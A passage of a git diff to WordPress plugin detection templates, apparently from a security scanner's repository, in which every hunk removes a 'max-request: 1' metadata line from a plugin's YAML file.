tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml 